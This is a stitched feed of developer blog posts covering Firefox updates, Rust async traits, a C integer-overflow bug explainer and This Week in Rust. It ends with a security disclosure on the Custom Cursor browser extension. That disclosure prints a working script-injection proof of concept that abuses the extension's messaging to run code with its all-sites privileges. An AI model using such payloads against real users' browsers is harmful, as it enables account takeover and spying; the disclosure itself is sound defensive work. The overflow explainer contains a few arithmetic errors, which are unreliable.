Does it come as a surprise that Facebook tries to track your online behavior beyond the confines of just Facebook? If so, I’m sorry to be the bearer of bad news. Facebook definitely tries to track you outside of Facebook. But with Facebook Container you can put a privacy barrier between the social media giant and your online life outside of it. 

Facebook primarily investigates your interests outside of Facebook through their various widgets you find embedded ubiquitously about the web (e.g. “Like” buttons or Facebook comments on articles, social share features, etc.) 

<figcaption>Social widgets like these give Facebook and other platforms a sneaky means of tracking your interests around the web.</figcaption>

The privacy trade we make for the convenience of not needing to sign in to Facebook each time we visit the site (because it recognizes your browser as yours) is we give Facebook a potent way to track our moves around the web, since it can tell when you visit any web page embedded with its widgets. 

Facebook Container basically allows you the best of both worlds—you can preserve the convenience of not needing to sign in/out of Facebook, while placing a “container” around your Facebook profile so the company can’t follow you around the web anymore.

We hope one of these anti-tracker extensions provides you with a strong new layer of security. Feel free to explore more powerful privacy extensions on addons.mozilla.org

Firefox NightlyThese Weeks in Firefox: Issue 101

Highlights

    • We have begun to roll out fission to a fraction of users on the release channel! Here’s a reminder of what Fission is, and why it matters
      • Telemetry so far doesn’t show any problems with stability or performance. We’re keeping an eye on it.
    • Fluent milestone 1 is 100% completed! All DTDs have been removed from browser.xhtml!
        • A burndown chart for strings in browser.xhtml. No remaining DTDs
          • Caption: A burndown chart for strings in browser.xhtml. No remaining DTDs left.
    • A new group of students from Michigan State University are working on improvements to High Contrast Mode. See the High Contrast Mode section below for details. Thanks to Noah, Shao, Danielle, Avi, and Jack!
    • about:processes is a page that you can go to to see which Firefox processes are taking up power and memory on your machine
      • It’s now possible to record a performance profile for a process with only a single click from within about:processes!
      • Here’s an animated GIF demonstrating a example workflow of one-click profiling
    • The new tab redesign has officially graduated. The pref to enable the pre-89 design has been removed.
    • Experimental improvements to macOS video power consumption will land soon in bug 1653417.
      • Fullscreen Youtube video on macOS consumes only 80% of the power it otherwise would.
      • We’re looking for testers! Flip gfx.core-animation.specialize-video to test. We’re looking specifically for visual glitches in the video or its controls. We’d also like to confirm that power usage is reduced for fullscreen YouTube and Twitch videos.

Friends of the Firefox team

Introductions/Shout-outs

    • [mconley] Welcome Yasmin Shash and Hanna Jones!
    • [vchin] Welcome to Amir who has started as Desktop Integrations EM!

For contributions from September 8th to September 21st 2021, inclusive.

Resolved bugs (excluding employees)

Fixed more than one bug

    • Antonin Loubiere
    • Itiel

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

WebExtensions Framework

Downloads Panel

Fluent

    • Milestone 1 has been completed! All DTDs have been removed from browser.xhtml!
      • As a bonus, this also means that all DTDs have been removed from the startup path, which was a goal for Milestone 2!
      • Are We Fluent Yet?
      • Congratulations to Katherine and Niklas for finally getting us over this milestone!

Form Autofill

High-Contrast Mode (MSU Capstone project)

Lint, Docs and Workflow

macOS Spotlight

    • Window spotlight buttons will now be on the correct side in RTL builds: bugs 1633860 & 1419375.
    • We noticed some users unfamiliar with macOS conventions were running Firefox directly from its DMG file. This can result in data loss and slow startup times, since Firefox is not fully installed. We now show a message warning the user in this scenario (bug 516362).

New Tab Page

    • New tab redesign has officially graduated. Old design pref & related code removed. Bug 1710937 👏
    • CSS variables simplified & cleanup. Allowing for easier theming (bug 1727319, 1726432, 1727321)
    • The ntp_text theme API property was broken, and now it isn’t! (bug 1713778)

Nimbus / Experiments

    • Bug 1730924 We want to update the Ajv JSON schema validator in tree

Password Manager

PDFs & Printing

Performance

    • Gijs has filed some bugs to make process flipping less likely when Fission is enabled
    • We’ve been seeing a slow but steady decline in the percentage of clients on Nightly seeing tab switch spinners. This might be related to Fission, WebRender, hardware churn, or might be a measurement artifact due to old builds sending telemetry. We’re not sure.
    • Thanks to jstutte for landing a patch that removes some main thread IO during startup when checking if we need to be doing an LMDB migration!

Performance Tools

    • Thanks to our contributor, mhansen, Linux perf profiles now include different colors for kernel vs user stack frames.
    • Two side-by-side images of performance profiles. The right side now has bright colors

      Caption: Two side-by-side images of performance profiles. The right side now has bright colors

Proton

Search and Navigation

    • Firefox Suggest is a new feature we’re working on to help you find the best of the web more quickly and easily!
    • Drew enabled the Firefox Suggest offline scenario for en-* users in the US region and made some tweaks to the Address Bar preferences UI
    • Daisuke fixed a regression where the Address Bar was not providing switch-tab results when history results were disabled – Bug 1477895

Screenshots

Niko MatsakisDyn async traits, part 1

Over the last few weeks, Tyler Mandry and I have been digging hard into what it will take to implement async fn in traits. Per the new lang team initiative process, we are collecting our design thoughts in an ever-evolving website, the async fundamentals initiative. If you’re interested in the area, you should definitely poke around; you may be interested to read about the MVP that we hope to stabilize first, or the (very much WIP) evaluation doc which covers some of the challenges we are still working out. I am going to be writing a series of blog posts focusing on one particular thing that we have been talking through: the problem of dyn and async fn. This first post introduces the problem and the general goal that we are shooting for (but don’t yet know the best way to reach).

What we’re shooting for

What we want is simple. Imagine this trait, for “async iterators”:

trait AsyncIter {
    type Item;
    async fn next(&mut self) -> Option<Self::Item>;
}

We would like you to be able to write a trait like that, and to implement it in the obvious way:

struct SleepyRange {
    start: u32,
    stop: u32,
}

impl AsyncIter for SleepyRange {
    type Item = u32;
    
    async fn next(&mut self) -> Option<Self::Item> {
        tokio::sleep(1000).await; // just to await something :)
        let s = self.start;
        if s < self.stop {
            self.start = s + 1;
            Some(s)
        } else {
            None
        }
    }
}

You should then be able to have a Box<dyn AsyncIter<Item = u32>> and use that in exactly the way you would use a Box<dyn Iterator<Item = u32>> (but with an await after each call to next, of course):

let b: Box<dyn AsyncIter<Item = u32>> = ...;
let i = b.next().await;

Desugaring to an associated type

Consider this running example:

trait AsyncIter {
    type Item;
    async fn next(&mut self) -> Option<Self::Item>;
}

Here, the next method will desugar to a fn that returns some kind of future; you can think of it like a generic associated type:

trait AsyncIter {
    type Item;

    type Next<'me>: Future<Output = Self::Item> + 'me;
    fn next(&mut self) -> Self::Next<'_>;
}

The corresponding desugaring for the impl would use type alias impl trait:

struct SleepyRange {
    start: u32,
    stop: u32,
}

// Type alias impl trait:
type SleepyRangeNext<'me> = impl Future<Output = u32> + 'me;

impl AsyncIter for InfinityAndBeyond {
    type Item = u32;
    
    type Next<'me> = SleepyRangeNext<'me>;
    fn next(&mut self) -> SleepyRangeNext<'me> {
        async move {
            tokio::sleep(1000).await;
            let s = self.start;
            ... // as above
        }
    }
}

This desugaring works quite well for standard generics (or impl Trait). Consider this function:

async fn process<T>(t: &mut T) -> u32
where
    T: AsyncIter<Item = u32>,
{
    let mut sum = 0;
    while let Some(x) = t.next().await {
        sum += x;
        if sum > 22 {
            break;
        }
    }
    sum
}

This code will work quite nicely. For example, when you call t.next(), the resulting future will be of type T::Next. After monomorphization, the compiler will be able to resolve <SleepyRange as AsyncIter>::Next to the SleepyRangeNext type, so that the future is known exactly. In fact, crates like embassy already use this desugaring, albeit manually and only on nightly.

Associated types don’t work for dyn

Unfortunately, this desugaring causes problems when you try to use dyn values. Today, when you have dyn AsyncIter, you must specify the values for all associated types defined in AsyncIter. So that means that instead of dyn AsyncIter<Item = u32>, you would have to write something like

for<'me> dyn AsyncIter<
    Item = u32, 
    Next<'me> = SleepyRangeNext<'me>,
>

This is clearly a non-starter from an ergonomic perspective, but is has an even more pernicious problem. The whole point of a dyn trait is to have a value where we don’t know what the underlying type is. But specifying the value of Next<'me> as SleepyRangeNext means that there is exactly one impl that could be in use here. This dyn value must be a SleepyRange, since no other impl has that same future.

Conclusion: For dyn AsyncIter to work, the future returned by next() must be independent of the actual impl. Furthermore, it must have a fixed size. In other words, it needs to be something like Box<dyn Future<Output = u32>>.

How the async-trait crate solves this problem

You may have used the async-trait crate. It resolves this problem by not using an associated type, but instead desugaring to Box<dyn Future> types:

trait AsyncIter {
    type Item;

    fn next(&mut self) -> Box<dyn Future<Output = Self::Item> + Send + 'me>;
}

This has a few disadvantages:

  • It forces a Box all the time, even when you are using AsyncIter with static dispatch.
  • The type as given above says that the resulting future must be Send. For other async fn, we use auto traits to analyze automatically whether the resulting future is send (it is Send it if it can be, in other words; we don’t declare up front whether it must be).

Conclusion: Ideally we want Box when using dyn, but not otherwise

So far we’ve seen:

  • If we desugar async fn to an associated type, it works well for generic cases, because we can resolve the future to precisely the right type.
  • But it doesn’t work for doesn’t work well for dyn trait, because the rules of Rust require that we specify the value of the associated type exactly. For dyn traits, we really want the returned future to be something like Box<dyn Future>.
    • Using Box does mean a slight performance penalty relative to static dispatch, because we must allocate the future dynamically.

What we would ideally want is to only pay the price of Box when using dyn:

  • When you use AsyncIter in generic types, you get the desugaring shown above, with no boxing and static dispatch.
  • But when you create a dyn AsyncIter, the future type becomes Box<dyn Future<Output = u32>>.
    • (And perhaps you can choose another “smart pointer” type besides Box, but I’ll ignore that for now and come back to it later.)

In upcoming posts, I will dig into some of the ways that we might achieve this.

Mozilla Attack & DefenseFixing a Security Bug by Changing a Function Signature

Or: The C Language Itself is a Security Risk, Exhibit #958,738

This post is aimed at people who are developers but who do not know C or low-level details about things like sign extension. In other words, if you’re a seasoned pro and you eat memory safety vulnerabilities for lunch, then this will all be familiar territory for you; our goal here is to dive deep into how integer overflows can happen in real code, and to break the topic down in detail for people who aren’t as familiar with this aspect of security.

The Bug

In July of 2020, I was sent Mozilla bug 1653371 (later assigned CVE-2020-15667). The reporter had found a segfault due to heap overflow in the library that parses MAR files1, which is the custom package format that’s used in the Firefox/Thunderbird application update system. So that doesn’t sound great. (spoiler: it isn’t as bad as it sounds because that overflow happens after the MAR file has had its signature validated already)

The Fix

The patch I wrote for this bug consists entirely of changing one function signature in a C source file from this:

static int mar_insert_item(MarFile* mar, const char* name, int namelen,
                           uint32_t offset, uint32_t length, uint32_t flags)

to this:

static int mar_insert_item(MarFile* mar, const char* name, uint32_t namelen,
                           uint32_t offset, uint32_t length, uint32_t flags)

I swear that is the entire patch. All I had to do was change the type of one of this function’s parameters from int to uint32_t. Can that change really fix a security bug? It can, and it did, and I’ll explain how. We have some background to cover first, though.

Background

The problem here comes down to numbers and how computers work with them, so let’s talk a bit about that first2. Since the bug is in a file written in the C language, our discussion will be from that perspective, but I am going to try to explain things so that you don’t need to know C or much at all about low-level programming in order to understand what happened.

Binary Numbers

Any number that your computer is going to work with has to be stored in terms of binary bits. The way those work isn’t as complicated as it might seem.

Think about how you write a number in decimal digits using place value. If we want to write the number one thousand, three hundred, and twelve, we need four digits: 1,312. What does each one of those digits mean? Well the rightmost 2 means… 2. But the 1 next to that doesn’t mean 1, it means 10. You take the digit itself and multiply that by 10 to get the value that’s being represented there. And then as you go through the rest of the digits, you go up by another power of 10 for each one. The 3 doesn’t mean either 3 or 30, it means 300, because it’s being multiplied by 100. And the leftmost 1 gets multiplied by 1000.

Guess what? Binary numbers work the same way. The only difference is, since binary only has two different digits, 0 and 1, it doesn’t make any sense to use powers of 10; there’d be loads of numbers we couldn’t write, anything greater than 1 but less than 10 couldn’t be represented. So instead of that, we use powers of 2. Each successive digit isn’t multiplied by 1, 10, 100, 1000, etc., it’s multiplied by 1, 2, 4, 8, etc.

Let’s look at a couple of examples. Here’s the number twelve in binary: 1100. Why? Well, let’s do the same thing we did with our decimal example, multiply each digit. I’ll write out the whole thing this time:

1100
│││└─ 0 x (2 ^ 0) = 0 x 1 = 0
││└── 0 x (2 ^ 1) = 0 x 2 = 0
│└─── 1 x (2 ^ 2) = 1 x 4 = 4
└──── 1 x (2 ^ 3) = 1 x 8 = 8

0 + 0 + 4 + 8 = 12

There we go! We got 12. For each digit, we multiply its value by the power of 2 for that place value location (and the multiplication is pretty darn easy, because the only digits are 0 and 1), and then add up all those results. That’s it!

Binary Addition

Now, what if we need to do some math? That’s pretty much all computers are any good at, after all. Let’s say we want to add something to a binary number.

Well, we know how to do that in decimal: you add up each digit starting from the lowest one and carry over into the next digit if necessary. If you read the last section, you can probably guess what I’m about to say: that’s exactly what you do in binary too. Except again it’s even easier because there’s only two different digits.

Let’s have another simple example, 13 + 12. First we have to write both of those numbers in binary; we already know 12 is 1100, so 13 should just be one more than that, 1101. We’ll add them up the same way we add decimal numbers by hand:

  1100
+ 1101
------
 ?????

The first two digits are easy, 0 + 1 = 1, and 0 + 0 = 0.

  1100
+ 1101
------
 ???01

But now we have 1 + 1. Where do we go with that? There’s no 2. Well, just like in decimal, we have to carry out of that digit; the sum of 1 and 1 in binary is 10 (because that’s just binary for 2), so that means we need to write a 0 in that column and carry the 1.

  1
  1100
+ 1101
------
 ??001

Only one digit to go. Again, it’s 1 + 1, but now we have a 1 carried over from the previous digit. So really we have to do 1 + 1 + 1, which is 3 but in binary that’s 11. This is the last column now, so we don’t have to worry about carries anymore, we can just write that down:

  1
  1100
+ 1101
------
 11001

And we’re done! 1100 + 1101 = 11001. And to prove we got the right answer, let’s convert 11001 back to decimal, the same way we did before:

11001
││││└ 1 x (2 ^ 0) = 1 x  1 =  1
│││└─ 0 x (2 ^ 1) = 0 x  2 =  0
││└── 0 x (2 ^ 2) = 0 x  4 =  0
│└─── 1 x (2 ^ 3) = 1 x  8 =  8
└──── 1 x (2 ^ 4) = 1 x 16 = 16

1 + 0 + 0 + 8 + 16 = 25

So now we know we were right; 12 + 13 = 25, and 1100 + 1101 = 11001. That’s how you add numbers in binary.

Signed Integers and Two’s Complement

So far we’ve only talked about positive numbers, but that’s not all computers can handle; sometimes you also need negative numbers. But you don’t want every number to potentially be negative; a lot of the kinds of things that you need to keep track of in a program just cannot possibly be negative, and sometimes (as we’ll see) allowing certain things to be negative can be actively harmful.

So, computers (and many languages, including C) provide two different kinds of integers that the programmer can select between whenever they need an integer: “signed” or “unsigned”. “Signed” means that the number can be either negative or positive (or zero), and “unsigned” means it can only be positive (or zero)3.

What we’ve been talking about up to now are unsigned integers, so how do signed integers work? To start with, the first bit of the number isn’t part of the number itself anymore, it’s now the “sign bit”. If the sign bit is 0, the number is nonnegative (either zero or positive), and if the sign bit is 1, the number is negative. But, when the sign bit is 1, we need a couple extra steps to convert between binary and decimal. Here’s the procedure.

  1. Discard the sign bit before doing anything else.
  2. Invert all the other bits in the number, meaning make every 1 a 0 and vice versa.
  3. Convert that binary number (the one with the bits flipped) to decimal the usual way.
  4. Add 1 to that result.

This operation, with the inversion and the adding 1, is called “two’s complement”, and it’ll get you the value of the negative number. Let’s go through another simple example.

Let’s say we have a signed 8-bit integer and the value is 11010110. What is that in decimal? Well, we see right away that the sign bit is set, so we need to take the two’s complement. First, we need to flip all the bits except the sign bit, so that gets us 0101001. Now we convert that to decimal and add 1.

0101001
││││││└ 1 x (2 ^ 0) = 1 x  1 =  1
│││││└─ 0 x (2 ^ 1) = 0 x  2 =  0
││││└── 0 x (2 ^ 2) = 0 x  4 =  0
│││└─── 1 x (2 ^ 3) = 1 x  8 =  8
││└──── 0 x (2 ^ 4) = 0 x 16 =  0
│└───── 1 x (2 ^ 4) = 1 x 32 = 32
└──────

1 + 0 + 0 + 8 + 0 + 32 = 41

41 + 1 = 42

Now just remember to add back the negative sign, and we get -42. That’s our number! 11010110 interpreted as a signed integer is -42.

Why?

Why do we bother with any of this? Why not do something simple like have the sign bit and then just the regular number4? Well, the two’s complement representation has one huge advantage: you can completely disregard it while doing basic arithmetic. The exact same hardware and logic can do arithmetic on both unsigned numbers and signed two’s complement numbers5. That means the hardware is simpler, which means it’s smaller, cheaper, and faster. That mattered more in the early days of digital computers, which is why two’s complement caught on as the standard, and it’s still with us today.

Sign Extension

There’s one other neat trick two’s complement let’s us do that we need to talk about. Integers in computers have a fixed “width”, or number of bits that are used to represent them. Wider integers can represent larger (or more negative) numbers, but take up more space in the computer’s memory. So to balance those concerns, languages like C give the programmer access to a few different bit widths to choose from for their integers.

So, what happens if we need to do some arithmetic between integers that are different widths, or just pass an integer into a function that’s narrower than the function expects? We need a way to make an integer wider. If it’s unsigned, that’s easy; copy over the same value into the lower (right-hand) bits and then fill in the new high bits with 0’s, and you’ll have the same value, just now with more bits.

But what if we need to widen a signed integer? Two’s complement’s here to save the day with a solution called “sign extension”. It turns out all we have to do to make a two’s complement integer wider is copy over the same value into the low bits and then fill in the new high bits with copies of the sign bit. That’s it.

It’s easy to see why that’s correct if we think about how two’s complement works. If the number is positive (the sign bit is 0), then it’s the same as for an unsigned number, we’ll fill in the new space with all zeroes and nothing changes. And if the number is negative (the sign bit is 1), then we’ll fill in the new space with 1 bits, but the two’s complement operation means those bits all get inverted into 0’s when we need to get the number’s value, so still nothing changes. These simple, efficient operations are why two’s complement is so neat, despite seeming weird and overcomplicated at first.

Hexadecimal Numbers

I’m going to use a few hexadecimal numbers in this article, but don’t worry, I’m not going to try to teach you how to work in a whole different number system yet again. You can think of hexadecimal as a shorthand for binary numbers. Hexadecimal (“hex” for short) uses the decimal digits 0-9 and also the letters A-F, for 16 possible digits total. Since each digit can have 16 values, each one can stand in for four binary digits.

Also, hex numbers in C and elsewhere are written starting with 0x. That’s not part of the number, it’s just telling you that the thing after it is written in hex so that you know how to read it.

You don’t need to know how to do any arithmetic directly on hex numbers or anything like that, just see how they convert to binary bits. Here’s the conversions of individual hex digits to binary bits:

Binary  Hex
======  ===
 0000    0
 0001    1
 0010    2
 0011    3
 0100    4
 0101    5
 0110    6
 0111    7
 1000    8
 1001    9
 1010    A
 1011    B
 1100    C
 1101    D
 1110    E
 1111    F

Implicit Conversions in C

In C, unlike some languages, there are a bunch of different types that represent different ways of storing numbers; basically, every kind and size of number that CPU’s can work with has its own type in C. There’s also a “default” integer type, which is called int. How many bits are in an int depends on the C compiler you’re using (and on its settings)6, but it is guaranteed by the language standard to be signed.

Since C has so many different kinds of numbers, it’s common to need to convert between them. It’s so common in fact that the language designers decided to make those conversions mostly automatic. That means that, for instance, this code compiles and runs as you’d probably expect:

#include <math.h> // to get the declaration for sqrt()

long long geometric_mean(int a, int b) {
  return sqrt(a * b);
}

int main() {
  int a = 42;
  long b = 13;
  double mean = geometric_mean(a, b);
  return mean;
}

Even though none of the types in that code match up at all, the compiler just makes everything work for us. Nice of it, eh? These automatic “fixes” are called implicit conversions, and the rules for how they work are long and not always very intuitive. This is a pretty major gotcha of C programming, because it happens without the programmer even seeing it, you just have to know these things are happening and realize all the implications.

How the Bug Works

That should be all the background we need to understand what went wrong here. Now, let’s have another look back at that original, unpatched function declaration:

static int mar_insert_item(MarFile* mar, const char* name, int namelen,
                          uint32_t offset, uint32_t length, uint32_t flags)

The first two parameters are an internal data structure and a text string, they aren’t relevant here. But after that we see an int parameter, which is meant to contain the length of the string parameter (in C, strings don’t know their own length, the programmer has to keep track of that if they need it).

A few lines into the mar_insert_item function, we find this call:

memcpy(item->name, name, namelen + 1);

I’ll explain what this line is for before we move on. The mar_insert_item function is part of a procedure that reads the index of all the files contained in the MAR package (it’s kind of like a ZIP file, it can contain a bunch of different files and compress them all, and you can extract the whole thing or just individual files). mar_insert_item is called repeatedly, once for each compressed file, and each call adds one entry to the index that’s being gradually built up. This specific line just copies the file’s name into that index entry; memcpy of course is short for “memory copy”, and its parameters are the destination to copy to (which is the name field of the item we’re adding to our index), the source to copy from (the name string was passed into mar_insert_item in the first place), and the amount of memory that needs to be copied, in bytes. That last parameter is where everything goes wrong.

What do you think would happen if mar_insert_item is called with namelen set to the highest positive value it can store, which is 0x7fffffff? Well then, in this one line of code, the program does all of these things:

  1. A 1 gets added to namelen7. But I just said namelen already has the highest positive value it can store, so something has to give. The C language standard doesn’t define what happens in this case, but in practice what you get on most computers is… the addition just happens anyway. So we get the value 0x80000000. But namelen is a signed integer, and that value has its sign bit set! We’ve added 1 to a positive number and it transformed into a negative number. -2,147,483,648 to be precise8. Computers are weird. And we’re not even done yet.
  2. memcpy takes a 64-bit value, so our temporary value has to get extended from 32 bits to 64. That means a sign extension; we take the most significant bit, which is a 1, and copy it into 32 new bits, getting us the value 0xFFFFFFFF80000000. Remember, sign extension preserves the two’s complement value, so the decimal version of that number is still -2,147,483,648, it didn’t change during this step.
  3. The length parameter that memcpy takes is also supposed to be unsigned, so now that the value has been extended to 64 bits, we take those bits and interpret them as an unsigned number. We no longer have -2,147,483,648, we now have positive 9,223,372,036,854,775,807. As a byte length, that’s over a trillion terabytes9. Fair to say that’s more bytes than we could have really meant to be copying here.
  4. Finally, memcpy is called, and it starts trying to copy from name into item->name. But because of that sign extension and unsigned reinterpretation, we can see that it’s going to try to copy waaaaay more bytes than are actually there. So what memcpy ends up doing is copying all the bytes that are there (memcpy does its best for us even when we feed it junk), and then… crashing the program.

And that’s the bug; the updater crashes right here.

How the Fix Works

Now, with all that background, the fix makes perfect sense. Changing the parameter’s type means that the conversion to unsigned happens at the time mar_insert_item is called, and at that point the value being passed in is still a positive number, so converting it then is harmless (in fact it’s just nothing, that operation doesn’t do anything at all at that point). And then the + 1 is done to an unsigned number, so it’s harmless too, and there’s no sign extension to ever do because the thing being passed to memcpy is no longer signed. Everything gets a lot simpler to understand, and simultaneously more correct.

Takeaways

Don’t Use C

Implicit conversions are a misfeature. What they give you in convenience is more than erased by the potential for invisible bugs. More recently designed languages tend to be more strict about this sort of thing, Rust for instance just doesn’t have these kinds of implicit conversions at all, but C is from the 1970’s and It Made Sense At The Time™. But in C these things can’t really be avoided, they’re baked into the language. I’d very much recommend using another language for any new programs you work on, for this and a variety of other reasons10.

Layers of Security

This bug wasn’t exploitable in practice, partly because it’s just in an awkward place to exploit, but also because Firefox requires update files to be digitally signed by Mozilla or they won’t be read (beyond the minimum needed to check the signature), much less applied. That means that anybody wanting to attack Firefox users via this bug would also have to compromise Mozilla’s build infrastructure and use it to sign their own malicious MAR file. Having that additional layer of security makes most issues surrounding MAR files much much less concerning.

You Can Do Systems Programming

Something I’ve hoped to get across (and I acknowledge this may not be the ideal topic to make this point, but it’s an important point to me) is that low-level (“systems”) programming isn’t magic or really special in any way. It’s true there’s a lot going on and there’s lots of little details, but that’s true for any kind of programming, or anything else involving computers at all to be honest. Everything involved here was invented and built by people, and it can all be broken down and understood. And that’s the message I want to sign off with: you can do systems programming. It’s not too hard. It’s not too complicated. It’s not limited to just “experts”. You are smart and capable and you can do the thing.


1. A fair question to ask here would be why we even have our own package format. There’s a few reasons and you can read the original discussion from back when the format was first introduced if you’re interested, but the main benefit nowadays is that we’re able to locate and validate the package’s signature before really having to parse anything else. In fact, the bug that this post is about doesn’t get hit until after the MAR file has passed signature validation, so it could only be exploited using either a properly signed MAR or a custom build of Firefox/Thunderbird/whatever other application that disables MAR signing. ↩︎

2. I’m only going to talk about integers, because numbers that have a decimal or fraction part work very differently (and can be implemented a few different ways), and they aren’t relevant here. ↩︎

3. You almost never need numbers that can only be either negative or zero, so neither hardware nor languages generally support those, you’d just have to use a signed integer in that case. ↩︎

4. That is a real thing called signed magnitude and it is used for certain things, but not standard integers in modern computers. ↩︎

5. If you’re curious about the math that explains why this is the case, I’ll direct you to Wikipedia’s proof; I’ve spent enough time in the weeds for one blog post already. ↩︎

6. Theoretically int is meant to be whatever size the computer hardware you’re compiling your program for finds most convenient to work with (its “word size”), so it would be 32 bits on a 32-bit CPU and 64 bits on a 64-bit CPU. In practice though, for backwards compatibility reasons, int is usually 32 bits on all but pretty specialized hardware. It’s best never to depend on int being any particular size and to use the type that specifically represents a particular size if you need to be sure; for instance if you know you need exactly 32 bits, use int32_t, not int. ↩︎

7. If you don’t know C, you might be wondering what the + 1 is even for. It’s a little out of scope for this post, but in short, since as we mentioned earlier C strings don’t keep track of their length, if you don’t store that length off somewhere (and typically you don’t), you need some other way to find where the string ends. That’s done by adding one character made up of all zero bits to the end of the string, called a “null terminator”, so when you’re reading a string and you encounter a null character, then you know the string is over. Most C coding conventions have you leave the terminator out of the length, so whenever you’re doing something that needs to account for the terminator (like copying it, because then you have to copy the terminator also), you have to add 1 to the length so that you have space for it. C programming is full of fiddly details like this. ↩︎

8. This problem shows up so often and is such a common source of security bugs that it gets its own name, integer overflow. On Wikipedia you’ll find lots of famous examples and different ways to combat the issue. ↩︎

9. AKA one yottabyte. I swear that is really what it’s called. ↩︎

10. Yes, I acknowledge there are certain circumstances where you really must write things in C, or maybe C++ if you’re lucky. If you have one of those situations, then you already know whatever I could tell you. If you don’t, then don’t use C. And don’t @ me. ↩︎

This Week In RustThis Week in Rust 410

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is miette, a library for error handling that is beautiful both in code and output.

Thanks to Kat Marchán for the self-suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from the Rust Project

265 pull requests were merged in the last week

Rust Compiler Performance Triage

The largest story for the week are the massive improvements that come from enabling the new pass manager in LLVM which leads to consistent 5% to 30% improvements across almost all test cases. The regressions were mostly minor with clear paths for addressing the ones that were not made with some specific trade off in mind.

Triage done by @rylev. Revision range: 7743c9..83f147

4 Regressions, 4 Improvements, 3 Mixed; 0 of them in rollups

43 comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs
New RFCs

No new RFCs were proposed this week.

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Enso

Stockly

Timescale

ChainSafe

Kraken

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

This week we have two great quotes!

The signature of your function is your contract with not only the compiler, but also users of your function.

Quine Dot on rust-users

Do you want to know what was harder than learning lifetimes? Learning the same lessons through twenty years of making preventable mistakes.

Zac Burns in his RustConf talk

Thanks to Daniel H-M and Erik Zivkovic for the suggestions!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Wladimir PalantBreaking Custom Cursor to p0wn the web

Browser extensions make attractive attack targets. That’s not necessarily because of the data handled by the extension itself, but too often because of the privileges granted to the extension. Particularly extensions with access to all websites should better be careful and reduce the attack surface as much as possible. Today’s case study is Custom Cursor, a Chrome extension that more than 6 million users granted essentially full access to their browsing session.

A red mouse cursor with evil eyes grinning with its sharp teeth, next to it the text Custom Cursor<figcaption> Image credits: Custom Cursor, palomaironique </figcaption>

The attack surface of Custom Cursor is unnecessarily large: it grants custom-cursor.com website excessive privileges while also disabling default Content Security Policy protection. The result: anybody controlling custom-cursor.com (e.g. via one of the very common cross-site scripting vulnerabilities) could take over the extension completely. As of Custom Cursor 3.0.1 this particular vulnerability has been resolved, the attack surface remains excessive however. I recommend uninstalling the extension, it isn’t worth the risk.

Integration with extension’s website

The Custom Cursor extension will let you view cursor collections on custom-cursor.com website, installing them in the extension works with one click. The seamless integration is possible thanks to the following lines in extension’s manifest.json file:

"externally_connectable": {
  "matches": [ "*://*.custom-cursor.com/*" ]
},

This means that any webpage under the custom-cursor.com domain is allowed to call chrome.runtime.sendMessage() to send a message to this extension. The message handling in the extension looks as follows:

browser.runtime.onMessageExternal.addListener(function (request, sender, sendResponse) {
  switch (request.action) {
    case "getInstalled": {
      ...
    }
    case "install_collection": {
      ...
    }
    case "get_config": {
      ...
    }
    case "set_config": {
      ...
    }
    case "set_config_sync": {
      ...
    }
    case "get_config_sync": {
      ...
    }
  }
}.bind(this));

This doesn’t merely allow the website to retrieve information about the installed icon collections and install new ones, it also provides the website with arbitrary access to extension’s configuration. This in itself already has some abuse potential, e.g. it allows tracking users more reliably than with cookies as extension configuration will survive clearing browsing data.

The vulnerability

Originally I looked at Custom Cursor 2.1.10. This extension version used jQuery for its user interface. As noted before, jQuery encourages sloppy security practices, and Custom Cursor wasn’t an exception. For example, it would create HTML elements by giving jQuery HTML code:

collection = $(
  `<div class="box-setting" data-collname="${collname}">
    <h3>${item.name}</h3>
    <div class="collection-cursors" data-collname="${collname}">
    </div>
  </div>`
);

With collname being unsanitized collection name here, this code allows HTML injection. A vulnerability like that is normally less severe for browser extensions, thanks to their default Content Security Policy. Except that Custom Cursor doesn’t use the default policy but instead:

"content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'",

This 'unsafe-eval' allows calling inherently dangerous JavaScript functions like eval(). And what calls eval() implicitly? Why, jQuery of course, when processing a <script> tag in the HTML code. A malicious collection name like Test<script>alert(1)</script> will display the expected alert message when the list of collections is displayed by the extension.

So by installing a collection with a malicious name the custom-cursor.com website could run JavaScript code in the extension. But does that code also have access to all of extension’s privileges? Yes as the following code snippet proves:

chrome.runtime.sendMessage("ogdlpmhglpejoiomcodnpjnfgcpmgale", {
  action: "install_collection",
  slug: "test",
  collection: {
    id: 1,
    items: [],
    slug: "test",
    name: `Test
      <script>
        chrome.runtime.getBackgroundPage(page => page.console.log(1));
      </script>`
  }
})

When executed on any webpage under the custom-cursor.com domain this will install an empty icon collection. The JavaScript code in the collection name will retrieve the extension’s background page and output some text to its console. It could have instead called page.eval() to run additional code in the context of the background page where it would persist for the entire browsing session. And it would have access to all of extension’s privileges:

"permissions": [ "tabs", "*://*/*", "storage" ],

This extension has full access to all websites. So malicious code could spy on everything the user does, and it could even load more websites in the background in order to impersonate the user towards the websites. If the user is logged into Amazon for example, it could place an order and have it delivered to a new address. Or it could send spam via the user’s Gmail account.

What’s fixed and what isn’t

